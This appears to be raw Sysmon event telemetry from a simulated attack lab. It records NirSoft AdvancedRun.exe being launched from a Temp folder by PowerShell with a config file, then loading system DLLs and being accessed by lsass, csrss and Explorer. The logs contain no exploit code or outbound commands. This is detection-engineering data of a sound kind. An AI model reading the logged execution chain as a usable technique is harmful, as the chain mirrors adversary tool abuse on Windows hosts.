Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004007762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004007761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004007760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.012{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004007665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:55.208{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000004007644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004007629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.113{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.097{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.004{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.004{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.004{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004007623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004007622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004007621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004007620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004007619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft 